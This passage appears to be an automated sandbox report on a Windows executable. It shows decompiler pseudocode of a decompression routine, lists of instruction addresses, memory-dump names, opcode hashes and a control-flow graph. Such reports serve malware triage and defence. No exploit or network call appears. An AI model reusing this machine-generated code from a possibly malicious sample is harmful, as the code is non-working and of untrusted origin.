											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















                                  0x00407033
                                  0x00407033
                                  0x00407033
                                  0x00407033
                                  0x00407039
                                  0x0040703d
                                  0x00407041
                                  0x0040704b
                                  0x00407059
                                  0x0040732f
                                  0x0040732f
                                  0x00407332
                                  0x00407339
                                  0x00407366
                                  0x00407366
                                  0x0040736a
                                  0x00000000
                                  0x00000000
                                  0x0040736c
                                  0x00407375
                                  0x0040737b
                                  0x0040737e
                                  0x00407381
                                  0x00407384
                                  0x00407387
                                  0x0040738d
                                  0x004073a6
                                  0x004073a9
                                  0x004073b5
                                  0x004073b6
                                  0x004073b9
                                  0x0040738f
                                  0x0040738f
                                  0x0040739e
                                  0x004073a1
                                  0x004073a1
                                  0x004073c3
                                  0x00407363
                                  0x00407363
                                  0x00407363
                                  0x00407366
                                  0x0040736a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004073c5
                                  0x004073c5
                                  0x0040733e
                                  0x00407342
                                  0x0040747a
                                  0x0040747a
                                  0x00407484
                                  0x0040748c
                                  0x00407493
                                  0x00407495
                                  0x0040749c
                                  0x004074a0
                                  0x004074a0
                                  0x00407348
                                  0x0040734e
                                  0x00407355
                                  0x0040735d
                                  0x0040735d
                                  0x00407360
                                  0x00000000
                                  0x00407360
                                  0x004073ca
                                  0x004073d7
                                  0x004073da
                                  0x004072e6
                                  0x004072e6
                                  0x004072e6
                                  0x00406a82
                                  0x00406a82
                                  0x00406a82
                                  0x00406a8b
                                  0x00000000
                                  0x00000000
                                  0x00406a91
                                  0x00406a91
                                  0x00000000
                                  0x00406a98
                                  0x00406a9c
                                  0x00000000
                                  0x00000000
                                  0x00406aa2
                                  0x00406aa5
                                  0x00406aa8
                                  0x00406aab
                                  0x00406aaf
                                  0x00000000
                                  0x00000000
                                  0x00406ab5
                                  0x00406ab5
                                  0x00406ab8
                                  0x00406aba
                                  0x00406abb
                                  0x00406abe
                                  0x00406ac0
                                  0x00406ac1
                                  0x00406ac3
                                  0x00406ac6
                                  0x00406acb
                                  0x00406ad0
                                  0x00406ad9
                                  0x00406aec
                                  0x00406aef
                                  0x00406afb
                                  0x00406b23
                                  0x00406b25
                                  0x00406b33
                                  0x00406b33
                                  0x00406b37
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406b27
                                  0x00406b27
                                  0x00406b2a
                                  0x00406b2b
                                  0x00406b2b
                                  0x00000000
                                  0x00406b27
                                  0x00406afd
                                  0x00406b01
                                  0x00406b06
                                  0x00406b06
                                  0x00406b0f
                                  0x00406b17
                                  0x00406b1a
                                  0x00000000
                                  0x00406b20
                                  0x00406b20
                                  0x00000000
                                  0x00406b20
                                  0x00000000
                                  0x00406b3d
                                  0x00406b3d
                                  0x00406b41
                                  0x004073ed
                                  0x004073ed
                                  0x00000000
                                  0x004073ed
                                  0x00406b47
                                  0x00406b4a
                                  0x00406b5a
                                  0x00406b5d
                                  0x00406b60
                                  0x00406b60
                                  0x00406b60
                                  0x00406b63
                                  0x00406b67
                                  0x00000000
                                  0x00000000
                                  0x00406b69
                                  0x00406b69
                                  0x00406b6f
                                  0x00406b99
                                  0x00406b9f
                                  0x00406ba6
                                  0x00000000
                                  0x00406ba6
                                  0x00406b71
                                  0x00406b75
                                  0x00406b78
                                  0x00406b7d
                                  0x00406b7d
                                  0x00406b88
                                  0x00406b90
                                  0x00406b93
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406bd8
                                  0x00406bde
                                  0x00406be1
                                  0x00406bee
                                  0x00406bf6
                                  0x00000000
                                  0x00000000
                                  0x00406bad
                                  0x00406bad
                                  0x00406bb1
                                  0x004073fc
                                  0x004073fc
                                  0x00000000
                                  0x004073fc
                                  0x00406bb7
                                  0x00406bbd
                                  0x00406bc8
                                  0x00406bc8
                                  0x00406bc8
                                  0x00406bcb
                                  0x00406bce
                                  0x00406bd1
                                  0x00406bd6
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040726d
                                  0x0040726d
                                  0x00407273
                                  0x00407279
                                  0x0040727f
                                  0x00407299
                                  0x0040729c
                                  0x004072a2
                                  0x004072ad
                                  0x004072ad
                                  0x004072af
                                  0x00407281
                                  0x00407281
                                  0x00407290
                                  0x00407294
                                  0x00407294
                                  0x004072b9
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004072bb
                                  0x004072bf
                                  0x0040746e
                                  0x0040746e
                                  0x00000000
                                  0x0040746e
                                  0x004072c5
                                  0x004072cb
                                  0x004072d2
                                  0x004072da
                                  0x004072dd
                                  0x004072e0
                                  0x004072e0
                                  0x004072e6
                                  0x004072e6
                                  0x00000000
                                  0x00000000
                                  0x00406bfe
                                  0x00406bfe
                                  0x00406c00
                                  0x00406c03
                                  0x00406c74
                                  0x00406c74
                                  0x00406c77
                                  0x00406c7a
                                  0x00406c81
                                  0x00406c8b
                                  0x00000000
                                  0x00406c8b
                                  0x00406c05
                                  0x00406c05
                                  0x00406c09
                                  0x00406c0c
                                  0x00406c0e
                                  0x00406c11
                                  0x00406c14
                                  0x00406c16
                                  0x00406c19
                                  0x00406c1b
                                  0x00406c20
                                  0x00406c23
                                  0x00406c26
                                  0x00406c2a
                                  0x00406c31
                                  0x00406c34
                                  0x00406c3b
                                  0x00406c3f
                                  0x00406c47
                                  0x00406c47
                                  0x00406c47
                                  0x00406c41
                                  0x00406c41
                                  0x00406c41
                                  0x00406c36
                                  0x00406c36
                                  0x00406c36
                                  0x00406c4b
                                  0x00406c4e
                                  0x00406c6c
                                  0x00406c6c
                                  0x00406c6e
                                  0x00000000
                                  0x00406c50
                                  0x00406c50
                                  0x00406c50
                                  0x00406c53
                                  0x00406c56
                                  0x00406c59
                                  0x00406c5b
                                  0x00406c5b
                                  0x00406c5b
                                  0x00406c5e
                                  0x00406c61
                                  0x00406c63
                                  0x00406c64
                                  0x00406c67
                                  0x00000000
                                  0x00406c67
                                  0x00000000
                                  0x00406e9d
                                  0x00406e9d
                                  0x00406ea1
                                  0x00406ebf
                                  0x00406ebf
                                  0x00406ec2
                                  0x00406ec9
                                  0x00406ecc
                                  0x00406ecf
                                  0x00406ed2
                                  0x00406ed5
                                  0x00406ed8
                                  0x00406eda
                                  0x00406ee1
                                  0x00406ee2
                                  0x00406ee4
                                  0x00406ee7
                                  0x00406eea
                                  0x00406eed
                                  0x00406eed
                                  0x00406ef2
                                  0x00000000
                                  0x00406ef2
                                  0x00406ea3
                                  0x00406ea3
                                  0x00406ea6
                                  0x00406ea9
                                  0x00406eb3
                                  0x00000000
                                  0x00000000
                                  0x00406f07
                                  0x00406f07
                                  0x00406f0b
                                  0x00406f2e
                                  0x00406f31
                                  0x00406f34
                                  0x00406f3e
                                  0x00406f0d
                                  0x00406f0d
                                  0x00406f10
                                  0x00406f13
                                  0x00406f16
                                  0x00406f23
                                  0x00406f26
                                  0x00406f26
                                  0x00000000
                                  0x00000000
                                  0x00406f4a
                                  0x00406f4a
                                  0x00406f4e
                                  0x00000000
                                  0x00000000
                                  0x00406f54
                                  0x00406f54
                                  0x00406f58
                                  0x00000000
                                  0x00000000
                                  0x00406f5e
                                  0x00406f5e
                                  0x00406f60
                                  0x00406f64
                                  0x00406f64
                                  0x00406f67
                                  0x00406f6b
                                  0x00000000
                                  0x00000000
                                  0x00406fbb
                                  0x00406fbb
                                  0x00406fbf
                                  0x00406fc6
                                  0x00406fc6
                                  0x00406fc9
                                  0x00406fcc
                                  0x00406fd6
                                  0x00000000
                                  0x00406fd6
                                  0x00406fc1
                                  0x00406fc1
                                  0x00000000
                                  0x00000000
                                  0x00406fe2
                                  0x00406fe2
                                  0x00406fe6
                                  0x00406fed
                                  0x00406ff0
                                  0x00406ff3
                                  0x00406fe8
                                  0x00406fe8
                                  0x00406fe8
                                  0x00406ff6
                                  0x00406ff9
                                  0x00406ffc
                                  0x00406ffc
                                  0x00406fff
                                  0x00407002
                                  0x00407005
                                  0x00407005
                                  0x00407008
                                  0x0040700f
                                  0x00407014
                                  0x00000000
                                  0x00000000
                                  0x004070a2
                                  0x004070a2
                                  0x004070a6
                                  0x00407444
                                  0x00407444
                                  0x00000000
                                  0x00407444
                                  0x004070ac
                                  0x004070ac
                                  0x004070af
                                  0x004070b2
                                  0x004070b6
                                  0x004070b9
                                  0x004070bf
                                  0x004070c1
                                  0x004070c1
                                  0x004070c1
                                  0x004070c4
                                  0x004070c7
                                  0x00000000
                                  0x00000000
                                  0x00406c97
                                  0x00406c97
                                  0x00406c9b
                                  0x00407408
                                  0x00407408
                                  0x00000000
                                  0x00407408
                                  0x00406ca1
                                  0x00406ca1
                                  0x00406ca4
                                  0x00406ca7
                                  0x00406cab
                                  0x00406cae
                                  0x00406cb4
                                  0x00406cb6
                                  0x00406cb6
                                  0x00406cb6
                                  0x00406cb9
                                  0x00406cbc
                                  0x00406cbc
                                  0x00406cbf
                                  0x00406cc2
                                  0x00000000
                                  0x00000000
                                  0x00406cc8
                                  0x00406cc8
                                  0x00406cce
                                  0x00000000
                                  0x00000000
                                  0x00406cd4
                                  0x00406cd4
                                  0x00406cd8
                                  0x00406cdb
                                  0x00406cde
                                  0x00406ce1
                                  0x00406ce4
                                  0x00406ce5
                                  0x00406ce8
                                  0x00406cea
                                  0x00406cf0
                                  0x00406cf3
                                  0x00406cf6
                                  0x00406cf9
                                  0x00406cfc
                                  0x00406cff
                                  0x00406d02
                                  0x00406d1e
                                  0x00406d21
                                  0x00406d24
                                  0x00406d27
                                  0x00406d2e
                                  0x00406d32
                                  0x00406d34
                                  0x00406d38
                                  0x00406d04
                                  0x00406d04
                                  0x00406d08
                                  0x00406d10
                                  0x00406d15
                                  0x00406d17
                                  0x00406d19
                                  0x00406d19
                                  0x00406d3b
                                  0x00406d42
                                  0x00406d45
                                  0x00000000
                                  0x00406d4b
                                  0x00406d4b
                                  0x00000000
                                  0x00406d4b
                                  0x00000000
                                  0x00406d50
                                  0x00406d50
                                  0x00406d54
                                  0x00407414
                                  0x00407414
                                  0x00000000
                                  0x00407414
                                  0x00406d5a
                                  0x00406d5a
                                  0x00406d5d
                                  0x00406d60
                                  0x00406d64
                                  0x00406d67
                                  0x00406d6d
                                  0x00406d6f
                                  0x00406d6f
                                  0x00406d6f
                                  0x00406d72
                                  0x00406d75
                                  0x00406d75
                                  0x00406d75
                                  0x00406d7b
                                  0x00000000
                                  0x00000000
                                  0x00406d7d
                                  0x00406d7d
                                  0x00406d80
                                  0x00406d83
                                  0x00406d86
                                  0x00406d89
                                  0x00406d8c
                                  0x00406d8f
                                  0x00406d92
                                  0x00406d95
                                  0x00406d98
                                  0x00406d9b
                                  0x00406db3
                                  0x00406db6
                                  0x00406db9
                                  0x00406dbc
                                  0x00406dbc
                                  0x00406dbf
                                  0x00406dc3
                                  0x00406dc5
                                  0x00406d9d
                                  0x00406d9d
                                  0x00406da5
                                  0x00406daa
                                  0x00406dac
                                  0x00406dae
                                  0x00406dae
                                  0x00406dc8
                                  0x00406dcf
                                  0x00406dd2
                                  0x00000000
                                  0x00406dd4
                                  0x00406dd4
                                  0x00000000
                                  0x00406dd4
                                  0x00406dd2
                                  0x00406dd9
                                  0x00406dd9
                                  0x00406dd9
                                  0x00406dd9
                                  0x00000000
                                  0x00000000
                                  0x00406e14
                                  0x00406e14
                                  0x00406e18
                                  0x00407420
                                  0x00407420
                                  0x00000000
                                  0x00407420
                                  0x00406e1e
                                  0x00406e1e
                                  0x00406e21
                                  0x00406e24
                                  0x00406e28
                                  0x00406e2b
                                  0x00406e31
                                  0x00406e33
                                  0x00406e33
                                  0x00406e33
                                  0x00406e36
                                  0x00406e39
                                  0x00406e39
                                  0x00406e3f
                                  0x00406ddd
                                  0x00406ddd
                                  0x00406de0
                                  0x00000000
                                  0x00406de0
                                  0x00406e41
                                  0x00406e41
                                  0x00406e44
                                  0x00406e47
                                  0x00406e4a
                                  0x00406e4d
                                  0x00406e50
                                  0x00406e53
                                  0x00406e56
                                  0x00406e59
                                  0x00406e5c
                                  0x00406e5f
                                  0x00406e77
                                  0x00406e7a
                                  0x00406e7d
                                  0x00406e80
                                  0x00406e80
                                  0x00406e83
                                  0x00406e87
                                  0x00406e89
                                  0x00406e61
                                  0x00406e61
                                  0x00406e69
                                  0x00406e6e
                                  0x00406e70
                                  0x00406e72
                                  0x00406e72
                                  0x00406e8c
                                  0x00406e93
                                  0x00406e96
                                  0x00000000
                                  0x00406e98
                                  0x00406e98
                                  0x00000000
                                  0x00406e98
                                  0x00000000
                                  0x00407125
                                  0x00407125
                                  0x00407129
                                  0x00407450
                                  0x00407450
                                  0x00000000
                                  0x00407450
                                  0x0040712f
                                  0x0040712f
                                  0x00407132
                                  0x00407135
                                  0x00407139
                                  0x0040713c
                                  0x00407142
                                  0x00407144
                                  0x00407144
                                  0x00407144
                                  0x00407147
                                  0x00000000
                                  0x00000000
                                  0x00406ef5
                                  0x00406ef5
                                  0x00406ef8
                                  0x00000000
                                  0x00000000
                                  0x00407234
                                  0x00407234
                                  0x00407238
                                  0x0040725a
                                  0x0040725a
                                  0x0040725d
                                  0x00407267
                                  0x0040726a
                                  0x0040726a
                                  0x00000000
                                  0x0040726a
                                  0x0040723a
                                  0x0040723a
                                  0x0040723d
                                  0x00407241
                                  0x00407244
                                  0x00407244
                                  0x00407247
                                  0x00000000
                                  0x00000000
                                  0x004072f1
                                  0x004072f1
                                  0x004072f5
                                  0x00407313
                                  0x00407313
                                  0x00407313
                                  0x00407313
                                  0x0040731a
                                  0x00407321
                                  0x00407328
                                  0x00407328
                                  0x0040732f
                                  0x00407332
                                  0x00407339
                                  0x00000000
                                  0x0040733c
                                  0x004072f7
                                  0x004072f7
                                  0x004072fa
                                  0x004072fd
                                  0x00407300
                                  0x00407307
                                  0x0040724b
                                  0x0040724b
                                  0x0040724e
                                  0x00000000
                                  0x00000000
                                  0x004073e2
                                  0x004073e2
                                  0x004073e5
                                  0x004072e6
                                  0x004072e6
                                  0x004072e6
                                  0x00000000
                                  0x004072ec
                                  0x00000000
                                  0x0040701c
                                  0x0040701c
                                  0x0040701e
                                  0x00407025
                                  0x00407026
                                  0x00407028
                                  0x0040702b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040732f
                                  0x0040732f
                                  0x00407332
                                  0x00407339
                                  0x00000000
                                  0x0040733c
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00407061
                                  0x00407061
                                  0x00407064
                                  0x0040709a
                                  0x0040709a
                                  0x004071ca
                                  0x004071ca
                                  0x004071ca
                                  0x004071ca
                                  0x004071cd
                                  0x004071cd
                                  0x004071d0
                                  0x004071d2
                                  0x0040745c
                                  0x0040745c
                                  0x00000000
                                  0x0040745c
                                  0x004071d8
                                  0x004071d8
                                  0x004071db
                                  0x00000000
                                  0x00000000
                                  0x004071e1
                                  0x004071e1
                                  0x004071e5
                                  0x004071e8
                                  0x004071e8
                                  0x004071e8
                                  0x00000000
                                  0x004071e8
                                  0x00407066
                                  0x00407066
                                  0x00407068
                                  0x0040706a
                                  0x0040706c
                                  0x0040706f
                                  0x00407070
                                  0x00407072
                                  0x00407074
                                  0x00407077
                                  0x0040707a
                                  0x00407090
                                  0x00407090
                                  0x00407095
                                  0x004070cd
                                  0x004070cd
                                  0x004070d1
                                  0x004070fa
                                  0x004070fd
                                  0x004070ff
                                  0x00407106
                                  0x00407109
                                  0x0040710c
                                  0x0040710c
                                  0x00407111
                                  0x00407111
                                  0x00407113
                                  0x00407116
                                  0x0040711d
                                  0x00407120
                                  0x0040714d
                                  0x0040714d
                                  0x00407150
                                  0x00407153
                                  0x004071c7
                                  0x004071c7
                                  0x004071c7
                                  0x004071c7
                                  0x00000000
                                  0x004071c7
                                  0x00407155
                                  0x00407155
                                  0x0040715b
                                  0x0040715e
                                  0x00407161
                                  0x00407164
                                  0x00407167
                                  0x0040716a
                                  0x0040716d
                                  0x00407170
                                  0x00407173
                                  0x00407176
                                  0x0040718f
                                  0x00407191
                                  0x00407194
                                  0x00407195
                                  0x00407198
                                  0x0040719a
                                  0x0040719d
                                  0x0040719f
                                  0x004071a1
                                  0x004071a4
                                  0x004071a6
                                  0x004071a9
                                  0x004071ad
                                  0x004071af
                                  0x004071af
                                  0x004071b0
                                  0x004071b3
                                  0x004071b6
                                  0x00407178
                                  0x00407178
                                  0x00407180
                                  0x00407185
                                  0x00407187
                                  0x0040718a
                                  0x0040718a
                                  0x004071b9
                                  0x004071c0
                                  0x0040714a
                                  0x0040714a
                                  0x0040714a
                                  0x0040714a
                                  0x00000000
                                  0x004071c2
                                  0x004071c2
                                  0x00000000
                                  0x004071c2
                                  0x004071c0
                                  0x004070d3
                                  0x004070d3
                                  0x004070d6
                                  0x004070d8
                                  0x004070db
                                  0x004070de
                                  0x004070e1
                                  0x004070e3
                                  0x004070e6
                                  0x004070e9
                                  0x004070e9
                                  0x004070ec
                                  0x004070ec
                                  0x004070ef
                                  0x004070f6
                                  0x004070ca
                                  0x004070ca
                                  0x004070ca
                                  0x004070ca
                                  0x00000000
                                  0x004070f8
                                  0x004070f8
                                  0x00000000
                                  0x004070f8
                                  0x004070f6
                                  0x0040707c
                                  0x0040707c
                                  0x0040707f
                                  0x00407081
                                  0x00407084
                                  0x00000000
                                  0x00000000
                                  0x00406de3
                                  0x00406de3
                                  0x00406de7
                                  0x0040742c
                                  0x0040742c
                                  0x00000000
                                  0x0040742c
                                  0x00406ded
                                  0x00406ded
                                  0x00406df0
                                  0x00406df3
                                  0x00406df6
                                  0x00406df9
                                  0x00406dfc
                                  0x00406dff
                                  0x00406e01
                                  0x00406e04
                                  0x00406e07
                                  0x00406e0a
                                  0x00406e0c
                                  0x00406e0c
                                  0x00406e0c
                                  0x00000000
                                  0x00000000
                                  0x00406f6e
                                  0x00406f6e
                                  0x00406f72
                                  0x00407438
                                  0x00407438
                                  0x00000000
                                  0x00407438
                                  0x00406f78
                                  0x00406f78
                                  0x00406f7b
                                  0x00406f7e
                                  0x00406f81
                                  0x00406f83
                                  0x00406f83
                                  0x00406f83
                                  0x00406f86
                                  0x00406f89
                                  0x00406f8c
                                  0x00406f8f
                                  0x00406f92
                                  0x00406f95
                                  0x00406f96
                                  0x00406f98
                                  0x00406f98
                                  0x00406f98
                                  0x00406f9b
                                  0x00406f9e
                                  0x00406fa1
                                  0x00406fa4
                                  0x00406fa4
                                  0x00406fa4
                                  0x00406fa7
                                  0x00406fa9
                                  0x00406fa9
                                  0x00000000
                                  0x00000000
                                  0x004071eb
                                  0x004071eb
                                  0x004071eb
                                  0x004071ef
                                  0x00000000
                                  0x00000000
                                  0x004071f5
                                  0x004071f5
                                  0x004071f8
                                  0x004071fb
                                  0x004071fe
                                  0x00407200
                                  0x00407200
                                  0x00407200
                                  0x00407203
                                  0x00407206
                                  0x00407209
                                  0x0040720c
                                  0x0040720f
                                  0x00407212
                                  0x00407213
                                  0x00407215
                                  0x00407215
                                  0x00407215
                                  0x00407218
                                  0x0040721b
                                  0x0040721e
                                  0x00407221
                                  0x00407224
                                  0x00407228
                                  0x0040722a
                                  0x0040722d
                                  0x00000000
                                  0x0040722f
                                  0x0040722f
                                  0x00406fac
                                  0x00406fac
                                  0x00000000
                                  0x00406fac
                                  0x0040722d
                                  0x00407462
                                  0x00407462
                                  0x00000000
                                  0x00000000
                                  0x00406a91
                                  0x00407499
                                  0x00407499
                                  0x00000000
                                  0x00407499
                                  0x004072e6
                                  0x00407366
                                  0x0040732f

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 160a6c4a4e350cf2f60414e9b8c3d58ffbaab185e4b8aaf92204dccf5df956fa
                                  • Instruction ID: a7cd93b13192ddc82b920214167f5e61206f8c8658b3f9d41a1d2146159b2bab
                                  • Opcode Fuzzy Hash: 160a6c4a4e350cf2f60414e9b8c3d58ffbaab185e4b8aaf92204dccf5df956fa
                                  • Instruction Fuzzy Hash: 7DA15571E04229CBDB28CFA8C8446ADBBB1FF44305F14816ED856BB281C7786A86DF45
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407234 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 764 407234-407238 765 40725a-407267 764->765 766 40723a-40733c 764->766 768 40726a-40727f 765->768 776 407366-40736a 766->776 770 407281-407297 768->770 771 407299-4072af 768->771 772 4072b2-4072b9 770->772 771->772 774 4072e0 772->774 775 4072bb-4072bf 772->775 779 4072e6-4072ec 774->779 777 4072c5-4072dd 775->777 778 40746e-407478 775->778 780 4073ca-4073dd 776->780 781 40736c-40738d 776->781 777->774 784 407484-407497 778->784 788 406a91 779->788 789 407499 779->789 780->779 782 4073a6-4073b9 781->782 783 40738f-4073a4 781->783 786 4073bc-4073c3 782->786 783->786 787 40749c-4074a0 784->787 790 407363 786->790 791 4073c5 786->791 792 406a98-406a9c 788->792 793 406bd8-406bf9 788->793 794 406b3d-406b41 788->794 795 406bad-406bb1 788->795 789->787 790->776 805 407348-407360 791->805 806 40747a 791->806 792->784 801 406aa2-406aaf 792->801 793->768 799 406b47-406b60 794->799 800 4073ed-4073f7 794->800 796 406bb7-406bcb 795->796 797 4073fc-407406 795->797 803 406bce-406bd6 796->803 797->784 804 406b63-406b67 799->804 800->784 801->789 802 406ab5-406afb 801->802 807 406b23-406b25 802->807 808 406afd-406b01 802->808 803->793 803->795 804->794 809 406b69-406b6f 804->809 805->790 806->784 812 406b33-406b3b 807->812 813 406b27-406b31 807->813 810 406b03-406b06 GlobalFree 808->810 811 406b0c-406b1a GlobalAlloc 808->811 814 406b71-406b78 809->814 815 406b99-406bab 809->815 810->811 811->789 816 406b20 811->816 812->804 813->812 813->813 817 406b83-406b93 GlobalAlloc 814->817 818 406b7a-406b7d GlobalFree 814->818 815->803 816->807 817->789 817->815 818->817
                                  C-Code - Quality: 98%
                                  			E00407234() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004074A1))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
